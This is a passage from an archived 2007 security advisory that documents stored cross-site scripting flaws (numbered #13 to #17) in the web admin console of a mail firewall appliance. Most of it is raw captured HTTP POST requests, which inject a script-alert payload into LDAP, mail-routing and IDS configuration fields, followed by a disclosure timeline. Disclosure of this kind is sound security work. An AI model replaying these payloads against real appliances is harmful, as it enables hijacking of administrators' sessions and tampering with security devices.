Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #13 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D=
save
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D11;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/ldap_ConfigureService=
Properties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc=
countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD=
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
procId=3D164&rows%5B0%5D.attrName=3Dsync_time&rows%5B0%5D.attrType=3D2&ro=
ws%5B0%5D.attrValidate=3D%5B1-24%5D&rows%5B0%5D.attrValidateStr=3D%5B1-24=
%5D&rows%5B0%5D.attrDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.=
modifyable=3Dtrue&rows%5B0%5D.attrValueStrClone=3D24&rows%5B0%5D.langTagI=
d=3D2016401&rows%5B0%5D.attrValueStr=3D24&rows%5B1%5D.attrName=3Dsync_res=
ults_count&rows%5B1%5D.attrType=3D2&rows%5B1%5D.attrValidate=3D%5B1-500%5=
D&rows%5B1%5D.attrValidateStr=3D%5B1-500%5D&rows%5B1%5D.attrDepends=3D&ro=
ws%5B1%5D.multipleValue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.att=
rValueStrClone=3D50&rows%5B1%5D.langTagId=3D2016402&rows%5B1%5D.attrValue=
Str=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.a=
ttrName=3Dsync_rules_order&rows%5B2%5D.attrType=3D1&rows%5B2%5D.attrValid=
ate=3D&rows%5B2%5D.attrValidateStr=3D&rows%5B2%5D.attrDepends=3D&rows%5B2=
%5D.multipleValue=3D1&rows%5B2%5D.modifyable=3Dtrue&rows%5B2%5D.attrValue=
StrClone=3D&rows%5B2%5D.langTagId=3D2016403&rows%5B2%5D.attrValue=3D&rows=
%5B3%5D.attrName=3Dldap_fail_open&rows%5B3%5D.attrType=3D5&rows%5B3%5D.at=
trValidate=3D&rows%5B3%5D.attrValidateStr=3D&rows%5B3%5D.attrDepends=3D&r=
ows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3Dtrue&rows%5B3%5D.at=
trValueStrClone=3D1&rows%5B3%5D.langTagId=3D2016404&rows%5B3%5D.attrValue=
=3Dtrue&rows%5B4%5D.attrName=3Dldap_failure_count&rows%5B4%5D.attrType=3D=
2&rows%5B4%5D.attrValidate=3D%5B1-50%5D&rows%5B4%5D.attrValidateStr=3D%5B=
1-50%5D&rows%5B4%5D.attrDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4=
%5D.modifyable=3Dtrue&rows%5B4%5D.attrValueStrClone=3D3&rows%5B4%5D.langT=
agId=3D2016405&rows%5B4%5D.attrValueStr=3D3&rows%5B5%5D.attrName=3Dldap_m=
onitor_intvl&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrValidate=3D%5B1-144=
0%5D&rows%5B5%5D.attrValidateStr=3D%5B1-1440%5D&rows%5B5%5D.attrDepends=3D=
&rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3Dtrue&rows%5B5%5D.=
attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2016406&rows%5B5%5D.attrVal=
ueStr=3D5&rows%5B6%5D.attrName=3Dldap_alert_type&rows%5B6%5D.attrType=3D1=
2&rows%5B6%5D.attrValidate=3D%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+Labe=
lValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+Labe=
lValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelV=
alueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+La=
belValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=3D30060=
019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C300=
60009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=3D&rows%5=
B6%5D.multipleValue=3D0&rows%5B6%5D.modifyable=3Dtrue&rows%5B6%5D.attrVal=
ueStrClone=3D3&rows%5B6%5D.langTagId=3D2016407&rows%5B6%5D.attrValue=3D3&=
rows%5B7%5D.attrName=3Dldap_route_aft_masq&rows%5B7%5D.attrType=3D5&rows%=
5B7%5D.attrValidate=3D&rows%5B7%5D.attrValidateStr=3D&rows%5B7%5D.attrDep=
ends=3D&rows%5B7%5D.multipleValue=3D0&rows%5B7%5D.modifyable=3Dtrue&rows%=
5B7%5D.attrValueStrClone=3D0&rows%5B7%5D.langTagId=3D2016408&submitValue=3D=
Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:56 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #14 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D=
save
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D11;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/ldap_ConfigureService=
Properties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc=
countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD=
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
procId=3D164&rows%5B0%5D.attrName=3Dsync_time&rows%5B0%5D.attrType=3D2&ro=
ws%5B0%5D.attrValidate=3D%5B1-24%5D&rows%5B0%5D.attrValidateStr=3D%5B1-24=
%5D&rows%5B0%5D.attrDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.=
modifyable=3Dtrue&rows%5B0%5D.attrValueStrClone=3D24&rows%5B0%5D.langTagI=
d=3D2016401&rows%5B0%5D.attrValueStr=3D24&rows%5B1%5D.attrName=3Dsync_res=
ults_count&rows%5B1%5D.attrType=3D2&rows%5B1%5D.attrValidate=3D%5B1-500%5=
D&rows%5B1%5D.attrValidateStr=3D%5B1-500%5D&rows%5B1%5D.attrDepends=3D&ro=
ws%5B1%5D.multipleValue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.att=
rValueStrClone=3D50&rows%5B1%5D.langTagId=3D2016402&rows%5B1%5D.attrValue=
Str=3D50&rows%5B2%5D.attrName=3Dsync_rules_order&rows%5B2%5D.attrType=3D1=
&rows%5B2%5D.attrValidate=3D&rows%5B2%5D.attrValidateStr=3D&rows%5B2%5D.a=
ttrDepends=3D&rows%5B2%5D.multipleValue=3D1&rows%5B2%5D.modifyable=3Dtrue=
&rows%5B2%5D.attrValueStrClone=3D&rows%5B2%5D.langTagId=3D2016403&rows%5B=
2%5D.attrValue=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ro=
ws%5B3%5D.attrName=3Dldap_fail_open&rows%5B3%5D.attrType=3D5&rows%5B3%5D.=
attrValidate=3D&rows%5B3%5D.attrValidateStr=3D&rows%5B3%5D.attrDepends=3D=
&rows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3Dtrue&rows%5B3%5D.=
attrValueStrClone=3D1&rows%5B3%5D.langTagId=3D2016404&rows%5B3%5D.attrVal=
ue=3Dtrue&rows%5B4%5D.attrName=3Dldap_failure_count&rows%5B4%5D.attrType=3D=
2&rows%5B4%5D.attrValidate=3D%5B1-50%5D&rows%5B4%5D.attrValidateStr=3D%5B=
1-50%5D&rows%5B4%5D.attrDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4=
%5D.modifyable=3Dtrue&rows%5B4%5D.attrValueStrClone=3D3&rows%5B4%5D.langT=
agId=3D2016405&rows%5B4%5D.attrValueStr=3D3&rows%5B5%5D.attrName=3Dldap_m=
onitor_intvl&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrValidate=3D%5B1-144=
0%5D&rows%5B5%5D.attrValidateStr=3D%5B1-1440%5D&rows%5B5%5D.attrDepends=3D=
&rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3Dtrue&rows%5B5%5D.=
attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2016406&rows%5B5%5D.attrVal=
ueStr=3D5&rows%5B6%5D.attrName=3Dldap_alert_type&rows%5B6%5D.attrType=3D1=
2&rows%5B6%5D.attrValidate=3D%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+Labe=
lValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+Labe=
lValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelV=
alueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+La=
belValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=3D30060=
019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C300=
60009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=3D&rows%5=
B6%5D.multipleValue=3D0&rows%5B6%5D.modifyable=3Dtrue&rows%5B6%5D.attrVal=
ueStrClone=3D3&rows%5B6%5D.langTagId=3D2016407&rows%5B6%5D.attrValue=3D3&=
rows%5B7%5D.attrName=3Dldap_route_aft_masq&rows%5B7%5D.attrType=3D5&rows%=
5B7%5D.attrValidate=3D&rows%5B7%5D.attrValidateStr=3D&rows%5B7%5D.attrDep=
ends=3D&rows%5B7%5D.multipleValue=3D0&rows%5B7%5D.modifyable=3Dtrue&rows%=
5B7%5D.attrValueStrClone=3D0&rows%5B7%5D.langTagId=3D2016408&submitValue=3D=
Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #15 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=3D=
init&procId=3D164
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2842
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D11;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/ldap_ConfigureService=
Properties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc=
countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD=
APConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
procId=3D164&rows%5B0%5D.attrName=3Dsync_time&rows%5B0%5D.attrType=3D2&ro=
ws%5B0%5D.attrValidate=3D%5B1-24%5D&rows%5B0%5D.attrValidateStr=3D%5B1-24=
%5D&rows%5B0%5D.attrDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.=
modifyable=3Dtrue&rows%5B0%5D.attrValueStrClone=3D24&rows%5B0%5D.langTagI=
d=3D2016401&rows%5B0%5D.attrValueStr=3D24&rows%5B1%5D.attrName=3Dsync_res=
ults_count&rows%5B1%5D.attrType=3D2&rows%5B1%5D.attrValidate=3D%5B1-500%5=
D&rows%5B1%5D.attrValidateStr=3D%5B1-500%5D&rows%5B1%5D.attrDepends=3D&ro=
ws%5B1%5D.multipleValue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.att=
rValueStrClone=3D50&rows%5B1%5D.langTagId=3D2016402&rows%5B1%5D.attrValue=
Str=3D50&rows%5B2%5D.attrName=3Dsync_rules_order&rows%5B2%5D.attrType=3D1=
&rows%5B2%5D.attrValidate=3D&rows%5B2%5D.attrValidateStr=3D&rows%5B2%5D.a=
ttrDepends=3D&rows%5B2%5D.multipleValue=3D1&rows%5B2%5D.modifyable=3Dtrue=
&rows%5B2%5D.attrValueStrClone=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3=
C%2Fscript%3E&rows%5B2%5D.langTagId=3D2016403&rows%5B2%5D.attrValue=3D&ro=
ws%5B3%5D.attrName=3Dldap_fail_open&rows%5B3%5D.attrType=3D5&rows%5B3%5D.=
attrValidate=3D&rows%5B3%5D.attrValidateStr=3D&rows%5B3%5D.attrDepends=3D=
&rows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3Dtrue&rows%5B3%5D.=
attrValueStrClone=3D1&rows%5B3%5D.langTagId=3D2016404&rows%5B3%5D.attrVal=
ue=3Dtrue&rows%5B4%5D.attrName=3Dldap_failure_count&rows%5B4%5D.attrType=3D=
2&rows%5B4%5D.attrValidate=3D%5B1-50%5D&rows%5B4%5D.attrValidateStr=3D%5B=
1-50%5D&rows%5B4%5D.attrDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4=
%5D.modifyable=3Dtrue&rows%5B4%5D.attrValueStrClone=3D3&rows%5B4%5D.langT=
agId=3D2016405&rows%5B4%5D.attrValueStr=3D3&rows%5B5%5D.attrName=3Dldap_m=
onitor_intvl&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrValidate=3D%5B1-144=
0%5D&rows%5B5%5D.attrValidateStr=3D%5B1-1440%5D&rows%5B5%5D.attrDepends=3D=
&rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3Dtrue&rows%5B5%5D.=
attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2016406&rows%5B5%5D.attrVal=
ueStr=3D5&rows%5B6%5D.attrName=3Dldap_alert_type&rows%5B6%5D.attrType=3D1=
2&rows%5B6%5D.attrValidate=3D%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+Labe=
lValueBean%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+Labe=
lValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelV=
alueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+La=
belValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=3D30060=
019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C300=
60009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=3D&rows%5=
B6%5D.multipleValue=3D0&rows%5B6%5D.modifyable=3Dtrue&rows%5B6%5D.attrVal=
ueStrClone=3D3&rows%5B6%5D.langTagId=3D2016407&rows%5B6%5D.attrValue=3D3&=
rows%5B7%5D.attrName=3Dldap_route_aft_masq&rows%5B7%5D.attrType=3D5&rows%=
5B7%5D.attrValidate=3D&rows%5B7%5D.attrValidateStr=3D&rows%5B7%5D.attrDep=
ends=3D&rows%5B7%5D.multipleValue=3D0&rows%5B7%5D.modifyable=3Dtrue&rows%=
5B7%5D.attrValueStrClone=3D0&rows%5B7%5D.langTagId=3D2016408&submitValue=3D=
Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #16 ] :.

POST
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=3D=
save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailFirewall_MailRoutingInternal.do?method=3D=
init&isMenuToggled=3D1
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 100
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D11;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/mailFirewall_MailRout=
ingInternal.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc=
countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD=
APConfigurationMenu%2CMailRoutingMenu%2C;
/admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
dtype=3DINBOUND&input1=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscri=
pt%3E&input2=3D&submitValue=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:23:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ XSS #17 ] :.

POST https://172.0.0.2:10443/admin/mailIdsConfig.do?method=3Dsave HTTP/1.=
1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/mailIdsConfig.do?method=3Dinit&isMenuToggle=
d=3D1&procId=3D90
Accept-Language: es-ES,en-us;q=3D0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2237
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=3D2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=3D11;
itemToHighlight=3Dhttps%3A//172.0.0.2%3A10443/admin/mailIdsConfig.do%3Fme=
thod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=3D%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAc=
countMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD=
APConfigurationMenu%2CMailRoutingMenu%2CMailIPSMenu%2CApplicationLevelMen=
u%2CMailIDSMenu%2CApplicationLevelMenu%2C;
/admin/dnsProtection.dofirsttimeload=3D1; /admin/dnsProtection.do=3D;
JSESSIONID=3D5A6DABFA0209D0BEC17AF6841DEA184E
procId=3D10&rows%5B0%5D.attrName=3Dpass_monitor&rows%5B0%5D.attrType=3D5&=
rows%5B0%5D.attrValidate=3D&rows%5B0%5D.attrValidateStr=3D&rows%5B0%5D.at=
trDepends=3D&rows%5B0%5D.multipleValue=3D0&rows%5B0%5D.modifyable=3Dtrue&=
rows%5B0%5D.attrValueStrClone=3D0&rows%5B0%5D.langTagId=3D2000006&rows%5B=
1%5D.attrName=3Denable_dos&rows%5B1%5D.attrType=3D5&rows%5B1%5D.attrValid=
ate=3D&rows%5B1%5D.attrValidateStr=3D&rows%5B1%5D.attrDepends=3D&rows%5B1=
%5D.multipleValue=3D0&rows%5B1%5D.modifyable=3Dtrue&rows%5B1%5D.attrValue=
StrClone=3D0&rows%5B1%5D.langTagId=3D2000008&rows%5B2%5D.attrName=3Dshm_t=
imeout&rows%5B2%5D.attrType=3D2&rows%5B2%5D.attrValidate=3D%5B1-65535%5D&=
rows%5B2%5D.attrValidateStr=3D%5B1-65535%5D&rows%5B2%5D.attrDepends=3D&ro=
ws%5B2%5D.multipleValue=3D0&rows%5B2%5D.modifyable=3Dtrue&rows%5B2%5D.att=
rValueStrClone=3D100&rows%5B2%5D.langTagId=3D2001009&rows%5B2%5D.attrValu=
eStr=3D%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B3%5D.=
attrName=3Dshm_spamcount&rows%5B3%5D.attrType=3D2&rows%5B3%5D.attrValidat=
e=3D%5B1-65535%5D&rows%5B3%5D.attrValidateStr=3D%5B1-65535%5D&rows%5B3%5D=
=2EattrDepends=3D&rows%5B3%5D.multipleValue=3D0&rows%5B3%5D.modifyable=3D=
true&rows%5B3%5D.attrValueStrClone=3D100&rows%5B3%5D.langTagId=3D2001010&=
rows%5B3%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fs=
cript%3E&rows%5B4%5D.attrName=3Dpasscrackswitch&rows%5B4%5D.attrType=3D5&=
rows%5B4%5D.attrValidate=3D&rows%5B4%5D.attrValidateStr=3D&rows%5B4%5D.at=
trDepends=3D&rows%5B4%5D.multipleValue=3D0&rows%5B4%5D.modifyable=3Dtrue&=
rows%5B4%5D.attrValueStrClone=3D0&rows%5B4%5D.langTagId=3D2004104&rows%5B=
5%5D.attrName=3Dpasscrackcount&rows%5B5%5D.attrType=3D2&rows%5B5%5D.attrV=
alidate=3D%5B1-100%5D&rows%5B5%5D.attrValidateStr=3D%5B1-100%5D&rows%5B5%=
5D.attrDepends=3D&rows%5B5%5D.multipleValue=3D0&rows%5B5%5D.modifyable=3D=
true&rows%5B5%5D.attrValueStrClone=3D5&rows%5B5%5D.langTagId=3D2004105&ro=
ws%5B5%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA3%27%29%3C%2Fscr=
ipt%3E&rows%5B6%5D.attrName=3Dpasstimeout&rows%5B6%5D.attrType=3D2&rows%5=
B6%5D.attrValidate=3D%5B1-3600%5D&rows%5B6%5D.attrValidateStr=3D%5B1-3600=
%5D&rows%5B6%5D.attrDepends=3D&rows%5B6%5D.multipleValue=3D0&rows%5B6%5D.=
modifyable=3Dtrue&rows%5B6%5D.attrValueStrClone=3D60&rows%5B6%5D.langTagI=
d=3D2004106&rows%5B6%5D.attrValueStr=3D%27%3E%3Cscript%3Ealert%28%27SIA4%=
27%29%3C%2Fscript%3E&submitValue=3DSubmit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:24:22 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=3Dutf-8

=2E: [ TIMELINE ] :.

22/Mar/2007	- We publish the advisory.
07/Mar/2007	- Second contact. Provider doesn't answered.
27/Feb/2007	- First contact with provider.
19/Feb/2007	- Vulnerabilities founded.

--=_gantz-15840-1174901611-0001-2--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC